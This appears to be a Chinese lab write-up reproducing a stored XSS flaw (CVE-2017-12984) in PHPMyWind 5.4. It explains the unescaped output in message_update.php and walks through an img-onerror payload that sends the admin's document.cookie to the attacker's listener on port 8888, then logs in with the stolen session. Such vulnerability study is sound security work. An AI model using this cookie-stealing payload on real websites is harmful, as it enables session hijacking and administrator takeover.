0x0 环境

操作机:xp   192.168.110.128

目标:win2003    192.168.110.133

目标cms:PHPMyWind5.4

0x11 漏洞介绍

允许恶意访问者在客户留言处插入XSS利用语句,执行JS代码获取cookie,从而获取网站管理员权限。漏洞存在于message_update.php文件中的content参数。

漏洞影响版本:phpMyWind version <= 5.4

0x12 漏洞成因

处理客户留言内容的关键代码在message.php文件的第29行和34行

先看content参数,程序会使用htmlspecialchars() 函数把预定义的字符 "<" (小于)和 ">" (大于)转换为 HTML 实体,进行过滤,然后存储至数据库中,也就是对数据的入库进行了处理,这里并没有问题。

然后,我们再看看管理员修改留言的处理方式,代码在admin/ message_update.php文件的第26行,跟进$content参数,可以看到直接读取content内容并显示,也就是说数据的出库未进行处理造成XSS漏洞。

0x2 漏洞演示

1.操作机访问目标,首页-留言处输入xss测试代码

<img src=# οnerrοr=alert("hello"); >

2.目标机在后台/admin登陆,打开模块扩展管理-留言模块管理,对留言修改,触发xss,证明漏洞存在

3.操作机获取管理员cookie

代码:

<img src=x οnerrοr=document.body.appendChild(document.createElement('img')).setAttribute('src','http://192.168.110.128:8888/?='+document.cookie); >

通过img标签的图片报错onerror事件将document.cookie获取的Cookie信息发送至xp的8888端口上

4.操作机监听8888端口,当管理员(win2003)修改留言时,nc收到cookie

5.操作机通过得到的cookie登陆后台页面即可以管理员身份登陆

0x3 修复

升级最新版本

0x4 问题总结

复现时,在0x2的第4步出现问题,xp的nc监听不到信息,一开始怀疑是网络问题,数据包没发过来,或者发过来了xp的防火墙挡了,尝试从2003 ping xp,超时,关掉xp防火墙后,ping成功了,但还是监听不到cookie,于是怀疑数据包根本没发,即js没执行,一开始2003用的是ie,看不到网络请求信息,装上火狐后再打开xss的修改留言,发现xp收到了cookie,具体原因未知

有感,xss的成功与否,还和目标使用的浏览器有关

0x5 参考资料

http://www.atomsec.org/%E5%AE%89%E5%85%A8/phpmywind%E5%AD%98%E5%82%A8xss%E6%BC%8F%E6%B4%9E-cve-2017-12984/

https://www.ichunqiu.com/experiment/detail?id=60913&source=1

转载于:https://www.cnblogs.com/Rain99-/p/10701769.html

PHPMyWind5.4存储XSS(CVE-2017-12984)相关推荐

  1. 【漏洞学习——XSS】Destoon B2B网站管理系统存储xss

    漏洞简介 Destoon B2B网站管理系统存储xss,可打后台cookie 我们在修改资料的地方插入xss 查看源代码- - 发现没有做任何的过滤 <td class="tr&quo ...

  2. Megaupload存储服务计划2017回归 原用户数据将恢复

    在传奇网盘服务Megaupload被FBI突袭查封的五周年之际,创始人Kim Dotcom在推特上宣布将在明年内完成Megaupload回归计划,Megaupload 2.0将会与Bitcoin等公司 ...

  3. linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...

    0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...

  4. php cve 2017 12933,18-017 (March 27, 2018)

    描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...

  5. 存储型xss_web安全测试--XSS(跨站脚本)与CSRF

    XSS攻击原理 反射型 发出请求时,xss代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,xss代码随响应内容一起传回浏览器,最后浏览器解析执行xss代码.这个过程像一次反射,故叫反射 ...

  6. UEditor编辑器存储型XSS漏洞

    挖洞经验|UEditor编辑器存储型XSS漏洞 - FreeBuf网络安全行业门户 前言 UEditor是由百度web前端研发部开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点 ...

  7. OWASP TOP 10 2017版本

    pdf原文地址:http://www.owasp.org.cn/owasp-project/OWASPTop102017v1.3.pdf 1.前言 不安全的软件正在破坏着我们的金融.医疗.国防.能源和 ...

  8. ASP.NET Core中的OWASP Top 10 十大风险-跨站点脚本攻击 (XSS)

    本博文翻译自: https://dotnetcoretutorials.com/2017/10/25/owasp-top-10-asp-net-core-cross-site-scripting-xs ...

  9. 什么是跨站脚本 (XSS) 攻击?

    目录 定义 跨站点脚本的工作原理 进行攻击以感染网站 受感染的网站攻击用户 统计和分析 跨站点脚本攻击的类型 反射式(非持久性)XSS 反射式(非持久性)XSS 示例 存储(持久)XSS 存储(持久) ...

最新文章

  1. gdb相关(栈和寄存器)
  2. 结构最清晰的Yolov3 head和loss实现完全解析
  3. python 自动化框架打包_听说很多人都不会打包,教你Python实现前端自动化打包部署!...
  4. 微信平台全面封杀UBER的24小时里,优步做了什么
  5. flash cs3 代码提示 应该加强
  6. ysql怎么处理百分数? “%”
  7. 上传附件_留学落户|上传附件预审时一定一定要注意的问题!
  8. Vue检测当前是否处于mock模式
  9. 表单设置默认值_你还不知道表单怎么设计吗?看这里!
  10. FileSplit.exe
  11. linux位系统安装官方install_flash_player_npapi_linux.x86_64.tar.gz插件包的方法
  12. 国标GB28181摄像头直播视频流媒体服务器获取视频流失败问题分析
  13. OpenCV-Python教程:绘制直线、圆形、方形(line,circle,rectangle)
  14. linux快速查找文件
  15. Mybatis初学一个问题困扰一下午 The error may exist in com/.........
  16. openGauss:(5)openGauss简介
  17. 平安喜乐 | Python制作圣诞树和词云
  18. 操作系统学习笔记:保护
  19. H264码流分析工具
  20. JavaScript之作用域链 1

热门文章

  1. [游戏] 星际争霸2:一个新的传奇?
  2. 什么是跨域及怎么解决跨域问题?
  3. chm打开秒退_用熊猫看书来看chm,却自动退出,什么原因?
  4. 高性能PC机与服务器的真正区别
  5. download failed: assets/main/import/09/09f53264-cd95-4751-99ad-d516c164dd80._cconb.dbbin, status: 40
  6. 八月未央,梦落泸沽。
  7. 安装计算机的显卡出现问题,电脑显卡驱动安装失败如何解决
  8. 5G网络身份识别---详解5G-GUTI
  9. 数据防泄密工作企业该如何开展
  10. 设备使用python连接阿里Iot